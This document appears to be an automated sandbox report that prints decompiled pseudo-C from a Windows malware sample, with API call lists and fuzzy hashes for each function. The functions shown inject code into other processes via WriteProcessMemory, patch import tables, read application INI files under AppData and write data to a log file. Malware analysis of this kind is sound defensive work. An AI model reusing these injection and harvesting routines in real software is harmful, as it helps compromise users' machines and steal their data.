            										__eflags = _t192 - 0x26;
            										if(_t192 != 0x26) {
            											__eflags = _t192 - 0x2b;
            											if(_t192 == 0x2b) {
            												 *((char*)(_t145 + _t183)) = 0x20;
            											}
            										} else {
            											 *((char*)(_t145 + _t183)) = 0xa;
            										}
            										_t145 = _t145 + 1;
            										__eflags = _t145 -  *((intOrPtr*)(_t205 + 0x24));
            									} while (_t145 <  *((intOrPtr*)(_t205 + 0x24)));
            									goto L69;
            								}
            								_t201 =  &_v36;
            								_t146 = 7;
            								E0040F333(_t146, _t201);
            								_push(_t201);
            								_push(7);
            								goto L66;
            							} else {
            								L51:
            								_v16 = _v16 | _t190;
            								goto L52;
            							}
            						}
            					}
            					_t156 = E00416037( &_v24, _t195, _t216, _t108, 0x4e25, 0x10000000);
            					_t189 = _v24;
            					_t204 = _t156;
            					_v32 = _t204;
            					if(E004112FD(_t156, _v24) == 0) {
            						L32:
            						E00410418(_v32);
            						_t183 = 0;
            						goto L33;
            					} else {
            						goto L11;
            					}
            					do {
            						L11:
            						_t14 = _t204 + 1; // 0x1
            						_t194 = _t14;
            						if( *_t194 == 0) {
            							goto L31;
            						}
            						_t160 =  *_t204;
            						if(_t160 == 0x21) {
            							L21:
            							_t204 = _t194;
            							L22:
            							_t189 = _t204;
            							if(E00406638(_t204,  *(_t205 + 4),  *(_t205 + 8)) == 0) {
            								goto L31;
            							}
            							_t163 = _t188;
            							if(_t163 == 0) {
            								L29:
            								_v9 = 1;
            								L30:
            								if(_t188 != 2) {
            									goto L32;
            								}
            								goto L31;
            							}
            							_t164 = _t163 - 1;
            							if(_t164 == 0) {
            								_v9 = 0;
            								goto L30;
            							}
            							_t165 = _t164 - 1;
            							if(_t165 == 0) {
            								_t195 = 0x3c;
            								E004104CB( &_v96,  &_v96, 0, _t195);
            								_v80 =  &_v512;
            								_v96 = _t195;
            								_v76 = 0x103;
            								_t170 = InternetCrackUrlA( *(_t205 + 4),  *(_t205 + 8), 0,  &_v96);
            								__eflags = _t170 - 1;
            								if(_t170 == 1) {
            									__eflags = _v76;
            									if(_v76 > 0) {
            										E0040BAD0( &_v512);
            									}
            								}
            								goto L30;
            							}
            							_t173 = _t165 - 1;
            							if(_t173 == 0 || _t173 == 1) {
            								_v16 = _v16 | 0x00000001;
            								goto L29;
            							} else {
            								goto L30;
            							}
            						}
            						if(_t160 == 0x2d) {
            							goto L21;
            						}
            						if(_t160 == 0x40) {
            							goto L21;
            						}
            						if(_t160 == 0x5e) {
            							_t188 = 4;
            							goto L21;
            						} else {
            							_t188 = 0;
            							goto L22;
            						}
            						L31:
            						_t189 = _t204;
            						_t204 = E0041133B(_t204, 1);
            					} while (_t204 != 0);
            					goto L32;
            				}
            				_t212 =  *0x41a9d4 - _t183; // 0x0
            				if(_t212 == 0) {
            					goto L8;
            				} else {
            					_t205 = _a4;
            					if(E00406638(_t189,  *(_t205 + 4),  *(_t205 + 8)) != 0) {
            						_t176 = E00405FD1();
            						_v24 = _t176;
            						if(_t176 != 0) {
            							_t180 = E004066FA(_t195, 4,  &_v24,  *0x41a9d4);
            							_push(_v24);
            							if(_t180 == 0) {
            								E00410418();
            							}
            							E0040603C(_t189);
            						}
            						E00410418( *0x41a9d4);
            						E00410418( *0x41a9d8);
            						 *0x41a9d4 = _t183;
            						 *0x41a9d8 = _t183;
            					}
            					goto L9;
            				}
            			}

            APIs
            • EnterCriticalSection.KERNEL32(0041A9BC), ref: 00406EE5
            • LeaveCriticalSection.KERNEL32(0041A9BC), ref: 00406F66
            • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 004070BA
              • Part of subcall function 00405FD1: CreateMutexW.KERNEL32(0041A2C8,00000000,0041A870,0041A9BC,?,?,00406F14), ref: 00405FF9
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 004071EB
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
            • String ID:
            • API String ID: 4018265435-0
            • Opcode ID: dfc3f6939daf971f022ea04e6a520fe5a49b70be543f3356a493e96db219cd91
            • Instruction ID: 3cd55c20b642fc78b1d6b8e1fdfce49b821121673e8872ef817571e476f0ecf7
            • Opcode Fuzzy Hash: dfc3f6939daf971f022ea04e6a520fe5a49b70be543f3356a493e96db219cd91
            • Instruction Fuzzy Hash: 6CC1E030D04205AADF319BA1C941BEF7BA5AF04344F04847FE542BA2D2C77DA996CB5A
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 81%
            			E00408853(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
            				char _v524;
            				char _v588;
            				char _v620;
            				char _v632;
            				char _v636;
            				intOrPtr* _v644;
            				char _v656;
            				char _v668;
            				char _v672;
            				char _v676;
            				char _v680;
            				intOrPtr* _v684;
            				char _v688;
            				char _v692;
            				char _v700;
            				char _v708;
            				char _v712;
            				char _v720;
            				intOrPtr* _v724;
            				signed int _v728;
            				intOrPtr _v732;
            				intOrPtr* _v736;
            				intOrPtr* _v744;
            				intOrPtr* _v748;
            				char _v752;
            				void* __esi;
            				void* _t77;
            				intOrPtr _t80;
            				intOrPtr* _t83;
            				intOrPtr _t84;
            				intOrPtr* _t85;
            				void* _t87;
            				intOrPtr* _t89;
            				intOrPtr _t90;
            				void* _t91;
            				intOrPtr* _t93;
            				intOrPtr _t94;
            				void* _t95;
            				intOrPtr* _t97;
            				intOrPtr _t98;
            				void* _t99;
            				intOrPtr* _t101;
            				intOrPtr _t102;
            				intOrPtr* _t103;
            				intOrPtr* _t104;
            				intOrPtr* _t106;
            				intOrPtr* _t107;
            				intOrPtr* _t112;
            				void* _t114;
            				intOrPtr _t118;
            				intOrPtr _t120;
            				void* _t126;
            				intOrPtr* _t133;
            				intOrPtr* _t134;
            				void* _t163;
            				char* _t167;
            				char* _t168;
            				char* _t169;
            				char* _t170;
            				char* _t171;
            				intOrPtr* _t172;
            				intOrPtr _t174;
            				char* _t179;
            				signed int _t180;
            				void* _t182;
            
            				_t182 = (_t180 & 0xfffffff8) - 0x2a4;
            				if(E00415D45( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
            					L45:
            					return 1;
            				}
            				_t185 =  *__edx & 0x00000010;
            				if(( *__edx & 0x00000010) == 0) {
            					_t133 = E0041699E( &_v524, __eflags,  &_v524);
            					_t163 = 0;
            					_v644 = _t133;
            					__eflags = _t133;
            					if(_t133 == 0) {
            						goto L45;
            					}
            					_t167 =  &_v588;
            					_t77 = 0x53;
            					E0040F369(_t77, _t167);
            					_t80 =  *((intOrPtr*)( *_t133 + 0x90))(_t133, _t167,  &_v672);
            					__eflags = _t80;
            					if(_t80 != 0) {
            						L44:
            						 *((intOrPtr*)( *_t133 + 8))(_t133);
            						goto L45;
            					}
            					_t83 = _v684;
            					_t84 =  *((intOrPtr*)( *_t83 + 0x24))(_t83,  &_v692);
            					__eflags = _t84;
            					if(_t84 != 0) {
            						L43:
            						_t85 = _v692;
            						 *((intOrPtr*)( *_t85 + 8))(_t85);
            						goto L44;
            					} else {
            						goto L6;
            					}
            					do {
            						L6:
            						_t168 =  &_v620;
            						_t87 = 0x54;
            						E0040F369(_t87, _t168);
            						_t89 = _v700;
            						_t141 =  *_t89;
            						_t90 =  *((intOrPtr*)( *_t89 + 0x94))(_t89, _t168,  &_v668);
            						__eflags = _t90;
            						if(_t90 != 0) {
            							_v700 = _t163;
            						} else {
            							_v700 = E00416A20(_t141,  &_v680);
            						}
            						_t169 =  &_v656;
            						_t91 = 0x55;
            						E0040F369(_t91, _t169);
            						_t93 = _v712;
            						_t142 =  *_t93;
            						_t94 =  *((intOrPtr*)( *_t93 + 0x94))(_t93, _t169,  &_v676);
            						__eflags = _t94;
            						if(_t94 != 0) {
            							_v708 = _t163;
            						} else {
            							_v708 = E00416A20(_t142,  &_v688);
            						}
            						_t170 =  &_v656;
            						_t95 = 0x56;
            						E0040F369(_t95, _t170);
            						_t97 = _v724;
            						_t143 =  *_t97;
            						_t98 =  *((intOrPtr*)( *_t97 + 0x94))(_t97, _t170,  &_v700);
            						__eflags = _t98;
            						if(_t98 != 0) {
            							_v732 = _t163;
            						} else {
            							_v732 = E00416A20(_t143,  &_v712);
            						}
            						_t171 =  &_v692;
            						_t99 = 0x57;
            						E0040F369(_t99, _t171);
            						_t101 = _v736;
            						_t144 =  *_t101;
            						_t102 =  *((intOrPtr*)( *_t101 + 0x94))(_t101, _t171,  &_v708);
            						__eflags = _t102;
            						if(_t102 != 0) {
            							_t134 = 0;
            							__eflags = 0;
            						} else {
            							_t134 = E00416A20(_t144,  &_v720);
            						}
            						_t103 = _v736;
            						__eflags = _t103 - _t163;
            						if(_t103 == _t163) {
            							_t172 = __imp__#6;
            						} else {
            							__eflags =  *_t103 - _t163;
            							if( *_t103 == _t163) {
            								L33:
            								_t172 = __imp__#6;
            								 *_t172(_v736);
            								goto L35;
            							}
            							_t112 = _v744;
            							__eflags = _t112 - _t163;
            							if(_t112 == _t163) {
            								goto L33;
            							}
            							__eflags =  *_t112 - _t163;
            							if( *_t112 == _t163) {
            								goto L33;
            							}
            							__eflags = _t134 - _t163;
            							if(_t134 == _t163) {
            								goto L33;
            							}
            							__eflags =  *_t134 - _t163;
            							if( *_t134 == _t163) {
            								goto L33;
            							}
            							_t113 = _v732;
            							__eflags = _v732 - _t163;
            							if(_v732 != _t163) {
            								_t163 = E00410B54(_t113);
            							}
            							__eflags = _t163 - 1;
            							if(_t163 < 1) {
            								L28:
            								_t163 = 0x15;
            								goto L29;
            							} else {
            								__eflags = _t163 - 0xffff;
            								if(_t163 <= 0xffff) {
            									L29:
            									_v728 = _v728 & 0x00000000;
            									_t114 = 0x2c;
            									E0040F369(_t114,  &_v632);
            									_push(_t163);
            									_push(_v736);
            									_push(_t134);
            									_t118 = E00411220( &_v728,  &_v632, _v744);
            									_t182 = _t182 + 0x18;
            									__eflags = _t118;
            									if(_t118 > 0) {
            										_t174 = _a4;
            										_t120 = E00410818(_t118, _t174, _v728);
            										__eflags = _t120;
            										if(_t120 != 0) {
            											_t55 = _t174 + 4;
            											 *_t55 =  *((intOrPtr*)(_t174 + 4)) + 1;
            											__eflags =  *_t55;
            										}
            									}
            									E00410418(_v728);
            									_t163 = 0;
            									__eflags = 0;
            									goto L33;
            								}
            								goto L28;
            							}
            						}
            						L35:
            						__eflags = _v732 - _t163;
            						if(_v732 != _t163) {
            							 *_t172(_v732);
            						}
            						__eflags = _v744 - _t163;
            						if(_v744 != _t163) {
            							 *_t172(_v744);
            						}
            						__eflags = _t134 - _t163;
            						if(_t134 != _t163) {
            							 *_t172(_t134);
            						}
            						_t104 = _v748;
            						 *((intOrPtr*)( *_t104 + 8))(_t104);
            						_t106 = _v744;
            						_t107 =  *((intOrPtr*)( *_t106 + 0x24))(_t106,  &_v752);
            						__eflags = _t107;
            					} while (_t107 == 0);
            					_t133 = _v720;
            					goto L43;
            				}
            				_t179 =  &_v636;
            				_t126 = 0x52;
            				E0040F369(_t126, _t179);
            				_v672 = _t179;
            				E00415BE8( &_v524,  &_v672, _t185, 1, 5, E00408853, _a4, 0, 0, 0);
            				goto L45;
            			}

            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
            • String ID:
            • API String ID: 1075381090-0
            • Opcode ID: 537f3c1781016d8ad11d0c6d2a435427c902f41f1b82dda8680f7b0b0fd45726
            • Instruction ID: ed69c49dea863cd64fe349b8d465aa9b01a56cac77a617e2b5305d48863adfa0
            • Opcode Fuzzy Hash: 537f3c1781016d8ad11d0c6d2a435427c902f41f1b82dda8680f7b0b0fd45726
            • Instruction Fuzzy Hash: 9881AD71604301AFCB10EF61C944A6BB7E9EFC8714F04892FF885A7291DB78D906CB96
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 83%
            			E0040A447(void* __eflags, intOrPtr _a4) {
            				signed int _v5;
            				short _v20;
            				char _v40;
            				char _v60;
            				short _v84;
            				char _v112;
            				char _v144;
            				short _v664;
            				char _v1184;
            				short _v1704;
            				char _v2224;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				void* _t31;
            				long _t33;
            				void* _t36;
            				void* _t42;
            				void* _t44;
            				void* _t46;
            				long _t50;
            				short* _t58;
            				char* _t66;
            				short _t67;
            				void* _t68;
            				WCHAR* _t71;
            				long _t78;
            
            				_t31 = 0xe;
            				E0040F369(_t31,  &_v144);
            				_t33 =  &_v1184;
            				__imp__SHGetFolderPathW(0, 0x1a, 0, 0, _t33);
            				if(_t33 == 0) {
            					_t33 = E00415D45( &_v144,  &_v1184,  &_v1184);
            					if(_t33 != 0) {
            						_t36 = 0x10;
            						E0040F369(_t36,  &_v112);
            						_t33 = E00415D45( &_v112,  &_v1704,  &_v1184);
            						if(_t33 != 0) {
            							_t33 = GetFileAttributesW( &_v1704);
            							if(_t33 != 0xffffffff) {
            								_t42 = 0x11;
            								E0040F369(_t42,  &_v60);
            								_t44 = 0x12;
            								E0040F369(_t44,  &_v84);
            								_t46 = 0x13;
            								E0040F369(_t46,  &_v20);
            								_v5 = 0;
            								while(1) {
            									_push(_v5 & 0x000000ff);
            									_push( &_v60);
            									_t68 = 0xa;
            									_t71 =  &_v40;
            									_t50 = E004111A5( &_v60, _t68, _t71);
            									if(_t50 < 1) {
            										break;
            									}
            									_t50 = GetPrivateProfileIntW(_t71,  &_v84, 0xffffffff,  &_v1704);
            									_t78 = _t50;
            									if(_t78 == 0xffffffff) {
            										break;
            									}
            									_t50 = GetPrivateProfileStringW(_t71,  &_v20, 0,  &_v664, 0x104,  &_v1704);
            									if(_t50 == 0) {
            										L17:
            										_v5 = _v5 + 1;
            										if(_v5 < 0xfa) {
            											continue;
            										}
            										break;
            									}
            									_t58 =  &_v664;
            									if(_v664 == 0) {
            										L12:
            										if(_t78 != 1) {
            											_t66 =  &_v664;
            											L16:
            											_t50 = E0040A5CD(0, _t66, _a4, _t91);
            											if(_t50 == 0) {
            												break;
            											}
            											goto L17;
            										}
            										_t50 = E00415D45( &_v664,  &_v2224,  &_v1184);
            										_t91 = _t50;
            										if(_t50 == 0) {
            											goto L17;
            										}
            										_t66 =  &_v2224;
            										goto L16;
            									} else {
            										goto L9;
            									}
            									do {
            										L9:
            										if( *_t58 == 0x2f) {
            											_t67 = 0x5c;
            											 *_t58 = _t67;
            										}
            										_t58 = _t58 + 2;
            									} while ( *_t58 != 0);
            									goto L12;
            								}
            								return _t50;
            							}
            						}
            					}
            				}
            				return _t33;
            			}

            APIs
            • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000000), ref: 0040A46E
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0040A4C2
            • GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 0040A525
            • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 0040A551
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: PathPrivateProfile$AttributesCombineFileFolderString
            • String ID:
            • API String ID: 1702184609-0
            • Opcode ID: 03964ea05859b73fd404d36eef7cc1f024691935e78eb04a3fc820b37fc215cd
            • Instruction ID: eeff6a2648988d6c1ea58f5d368f08aa76d6875b6fca1a9b45307ab9f261ce8f
            • Opcode Fuzzy Hash: 03964ea05859b73fd404d36eef7cc1f024691935e78eb04a3fc820b37fc215cd
            • Instruction Fuzzy Hash: DC41AE72A00218AEDF20EBA4DC44ADE77BCAB05314F4081B7F654F71C0D7789E898B59
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 97%
            			E00406290(signed int __eax, void* __ecx, void* __edx, signed int _a4, char _a8) {
            				void* _v8;
            				intOrPtr _v12;
            				void* _t39;
            				intOrPtr _t46;
            				intOrPtr* _t47;
            				intOrPtr _t48;
            				intOrPtr* _t50;
            				char _t52;
            				char* _t55;
            				signed int _t57;
            				void* _t62;
            				intOrPtr* _t65;
            				intOrPtr _t66;
            				intOrPtr* _t67;
            				void* _t68;
            				intOrPtr* _t69;
            				void* _t71;
            				intOrPtr _t73;
            				intOrPtr _t74;
            				intOrPtr _t78;
            				void* _t79;
            				intOrPtr* _t80;
            				intOrPtr* _t82;
            				intOrPtr* _t90;
            
            				_t68 = __edx;
            				_push(__ecx);
            				_push(__ecx);
            				_t57 = __eax;
            				_t62 = 0;
            				if(__eax <= 0) {
            					L4:
            					_t71 = VirtualAllocEx(0xffffffff, 0, _t57 * 0x23, 0x3000, 0x40);
            					if(_t71 == 0) {
            						L35:
            						_t39 = 0;
            						__eflags = 0;
            						L36:
            						L37:
            						return _t39;
            					}
            					if(_a8 != 0) {
            						ResetEvent( *0x41a500);
            					}
            					_v8 = 0;
            					if(_t57 <= 0) {
            						L11:
            						if(_v8 != _t57) {
            							E004061F8(_t57, _a4);
            							__eflags = _a8;
            							if(_a8 != 0) {
            								SetEvent( *0x41a500);
            							}
            							goto L35;
            						}
            						if(_t57 <= 0) {
            							L30:
            							if(_a8 != 0) {
            								SetEvent( *0x41a500);
            							}
            							_t39 = 1;
            							goto L36;
            						}
            						_t69 = _a4;
            						_a4 = _t57;
            						do {
            							_v12 =  *((intOrPtr*)(_t69 + 8));
            							_v8 =  *_t69;
            							_t46 =  *0x41a2a4; // 0x400000
            							_t19 = _t46 + 0x3c; // 0xd0
            							_t65 =  *_t19 + _t46 + 0x80;
            							_t78 =  *_t65;
            							_t73 = _t46;
            							if(_t78 <= 0 ||  *((intOrPtr*)(_t65 + 4)) <= 0x14) {
            								L25:
            								_t74 =  *((intOrPtr*)(_t69 + 8));
            								_t66 =  *_t69;
            								_t79 = 0;
            								do {
            									_t29 = _t79 + 0x41a2b0; // 0x41a2b0
            									_t47 = _t29;
            									if( *_t47 == _t66) {
            										 *_t47 = _t74;
            									}
            									_t79 = _t79 + 4;
            								} while (_t79 < 0x18);
            							} else {
            								_t67 = _t78 + _t46;
            								while(1) {
            									_t48 =  *_t67;
            									if(_t48 == 0) {
            										goto L25;
            									}
            									_t80 = _t48 + _t73;
            									_t50 =  *((intOrPtr*)(_t67 + 0x10)) + _t73;
            									while(1) {
            										__eflags =  *_t80;
            										if( *_t80 == 0) {
            											break;
            										}
            										__eflags = _v8 -  *_t50;
            										if(_v8 ==  *_t50) {
            											 *_t50 = _v12;
            										}
            										_t80 = _t80 + 4;
            										_t50 = _t50 + 4;
            										__eflags = _t50;
            									}
            									_t67 = _t67 + 0x14;
            									__eflags = _t67;
            								}
            								goto L25;
            							}
            							_t69 = _t69 + 0x10;
            							_t30 =  &_a4;
            							 *_t30 = _a4 - 1;
            						} while ( *_t30 != 0);
            						goto L30;
            					} else {
            						_t82 = _a4 + 8;
            						_t90 = _t82;
            						while(1) {
            							_t52 = E00414D4A( *((intOrPtr*)(_t82 - 4)), _t62, _t68, _t90,  *((intOrPtr*)(_t82 - 8)), _t71);
            							if(_t52 == 0) {
            								goto L11;
            							}
            							 *_t82 = _t71;
            							_t71 = _t71 + _t52;
            							_v8 = _v8 + 1;
            							 *((char*)(_t82 + 4)) = _t52;
            							_t82 = _t82 + 0x10;
            							if(_v8 < _t57) {
            								continue;
            							}
            							goto L11;
            						}
            						goto L11;
            					}
            				}
            				_t55 = _a4 + 0xc;
            				while( *((intOrPtr*)(_t55 - 0xc)) != 0) {
            					 *((intOrPtr*)(_t55 - 4)) = 0;
            					 *_t55 = 0;
            					_t62 = _t62 + 1;
            					_t55 = _t55 + 0x10;
            					if(_t62 < _t57) {
            						continue;
            					}
            					goto L4;
            				}
            				_t39 = 0;
            				goto L37;
            			}

            APIs
            • VirtualAllocEx.KERNEL32(000000FF,00000000,00000012,00003000,00000040,00000000,774B9EB0,00000000,?,?,?,004064D9,0041A020,00000001,00403A56), ref: 004062CF
            • ResetEvent.KERNEL32(?,?,?,004064D9,0041A020,00000001,00403A56), ref: 004062EB
            • SetEvent.KERNEL32(?,?,?,004064D9,0041A020,00000001,00403A56), ref: 004063C8
            • SetEvent.KERNEL32(?,?,?,004064D9,0041A020,00000001,00403A56), ref: 004063E8
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Event$AllocResetVirtual
            • String ID:
            • API String ID: 4029583732-0
            • Opcode ID: 79a42644e9800509d00f06282d7b441e0614130ecf4ef545794b25c45a1bef69
            • Instruction ID: 440af4aa5eff8b68ca2e5716a9bd301e804f4625cf3f90e6ec50a552084cd708
            • Opcode Fuzzy Hash: 79a42644e9800509d00f06282d7b441e0614130ecf4ef545794b25c45a1bef69
            • Instruction Fuzzy Hash: 1341AF71900210EFDB25CF14C88469EBBA5FB05314F1680BEEC47AB391D338ADA1CB98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 95%
            			E00403D3B(void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4, void _a8) {
            				char _v5;
            				void _v12;
            				void* _t25;
            				void _t26;
            				signed int _t29;
            				void _t43;
            				void* _t53;
            				void* _t54;
            
            				_t54 = __esi;
            				_t53 = __edi;
            				_t25 =  *0x41a2a4; // 0x400000
            				_t26 = E00414E5F(_t25, __edi);
            				_v12 = _t26;
            				if(_t26 != 0) {
            					_v5 = 0;
            					if(DuplicateHandle(0xffffffff, _a4, __edi,  &_a4, 0, 0, 2) == 0) {
            						_v5 = 1;
            					}
            					_t29 =  *0x41a290; // 0x1
            					_push(_t54);
            					_a8 = _a8 | _t29 & 0x00000008;
            					if(WriteProcessMemory(_t53, 0x41a290 -  *0x41a2a4 + _v12,  &_a8, 4, 0) == 0) {
            						_v5 = _v5 + 1;
            					}
            					if(WriteProcessMemory(_t53, 0x41a2a4 -  *0x41a2a4 + _v12,  &_v12, 4, 0) == 0) {
            						_v5 = _v5 + 1;
            					}
            					if(E00403567(0x41a758, _t53, _v12,  *0x41a758) == 0) {
            						_v5 = _v5 + 1;
            					}
            					if(E00403567(0x41a75c, _t53, _v12,  *0x41a75c) == 0) {
            						_v5 = _v5 + 1;
            					}
            					if(_v5 == 0) {
            						_t43 = _v12;
            					} else {
            						VirtualFreeEx(_t53, _v12, 0, 0x8000);
            						goto L1;
            					}
            				} else {
            					L1:
            					_t43 = 0;
            				}
            				return _t43;
            			}











            0x00403d3b
            0x00403d3b
            0x00403d40
            0x00403d47
            0x00403d4e
            0x00403d53
            0x00403d68
            0x00403d75
            0x00403d77
            0x00403d77
            0x00403d7b
            0x00403d80
            0x00403d8a
            0x00403daa
            0x00403dac
            0x00403dac
            0x00403dcd
            0x00403dcf
            0x00403dcf
            0x00403de8
            0x00403dea
            0x00403dea
            0x00403e03
            0x00403e05
            0x00403e05
            0x00403e0b
            0x00403e22
            0x00403e0d
            0x00403e17
            0x00000000
            0x00403e17
            0x00403d55
            0x00403d55
            0x00403d55
            0x00403d55
            0x00403e27

            APIs
              • Part of subcall function 00414E5F: IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,?,00000000), ref: 00414E7B
            • DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002,00000000,00000000,?,?,?,00404CA7,?,00000000,?), ref: 00403D6D
            • WriteProcessMemory.KERNEL32(00000000,-00000014,?,00000004,00000000,?,?,?,?,00404CA7,?,00000000,?,?,00404E33,?), ref: 00403DA6
            • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000004,00000000,?,?,?,00404CA7,?,00000000,?,?,00404E33,?,?), ref: 00403DC8
            • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,00404CA7,?,00000000,?,?,00404E33), ref: 00403E17
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: MemoryProcessWrite$DuplicateFreeHandleReadVirtual
            • String ID:
            • API String ID: 2215616122-0
            • Opcode ID: 901bf7f83de90021b6d78801a68457826e1411dd754014b2c275f0fdf174f5d4
            • Instruction ID: 06437b0e4ecc118571950649d6d0c8a3d71037f44c4b294824d9b647c8a78842
            • Opcode Fuzzy Hash: 901bf7f83de90021b6d78801a68457826e1411dd754014b2c275f0fdf174f5d4
            • Instruction Fuzzy Hash: 14219E71504248BADB019FA4DD80EFE7F7CEF09358F0080AAFA01F6291D33A9B558729
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00416486(signed int __edx, void** __esi, void* _a4, signed int _a8) {
            				char _v5;
            				long _v12;
            				void _v20;
            				signed int _v24;
            				signed int _v28;
            				signed int _v32;
            				signed int _v36;
            				signed int _t26;
            				signed int _t29;
            				signed int _t46;
            				void** _t48;
            
            				_t48 = __esi;
            				_t46 = __edx;
            				_v5 = 0;
            				if(_a8 <= 0xa00000) {
            					_t26 = E0041583F( *__esi);
            					_v36 = _t26;
            					_v32 = _t46;
            					if((_t26 & _t46) != 0xffffffff && E0041581F( *__esi, 0, 0, 2) != 0) {
            						_t29 = E0041583F( *__esi);
            						_v28 = _t29;
            						_v24 = _t46;
            						if((_t29 & _t46) != 0xffffffff) {
            							E004104CB( &_v20,  &_v20, 0, 5);
            							_v20 = __esi[4] ^ _a8;
            							if(WriteFile( *__esi,  &_v20, 5,  &_v12, 0) == 0 || _v12 != 5 || WriteFile( *__esi, _a4, _a8,  &_v12, 0) == 0 || _v12 != _a8) {
            								E0041581F( *_t48, _v28, _v24, 0);
            								SetEndOfFile( *_t48);
            							} else {
            								_v5 = 1;
            							}
            						}
            						FlushFileBuffers( *_t48);
            						E0041581F( *_t48, _v36, _v32, 0);
            					}
            				}
            				return _v5;
            			}














            0x00416486
            0x00416486
            0x00416497
            0x0041649a
            0x004164a2
            0x004164a7
            0x004164ac
            0x004164b2
            0x004164cd
            0x004164d2
            0x004164d7
            0x004164dd
            0x004164e6
            0x004164f8
            0x0041650b
            0x0041653d
            0x00416544
            0x0041652e
            0x0041652e
            0x0041652e
            0x0041650b
            0x0041654c
            0x0041655b
            0x0041655b
            0x004164b2
            0x00416566

            APIs
              • Part of subcall function 0041583F: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,00000000,00000000), ref: 00415854
              • Part of subcall function 0041581F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,0041645F,?,00000000,00000000,00000000,00000000), ref: 00415831
            • WriteFile.KERNEL32(?,?,00000005,00000000,00000000,?,00000000,00000005,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 00416507
            • WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 00416520
            • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00416544
            • FlushFileBuffers.KERNEL32(?,?,?,00000000,00000000,00000002,?,00000000,00000000), ref: 0041654C
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: File$PointerWrite$BuffersFlush
            • String ID:
            • API String ID: 1289656144-0
            • Opcode ID: d65ae89fc0887a5cf885015d7e82da30abf875ccc16445155c69be68c20b5184
            • Instruction ID: 8ee1fa0edf91c0ffceb780e2c328f313bc3f79b6c5672d3b62dd76ee25bc7518
            • Opcode Fuzzy Hash: d65ae89fc0887a5cf885015d7e82da30abf875ccc16445155c69be68c20b5184
            • Instruction Fuzzy Hash: 8F314176800108FEDF11AFA4DD81EEEBBBABF04344F11852AF591A1164D33A9995DB24
            Uniqueness

            Uniqueness Score: -1.00%
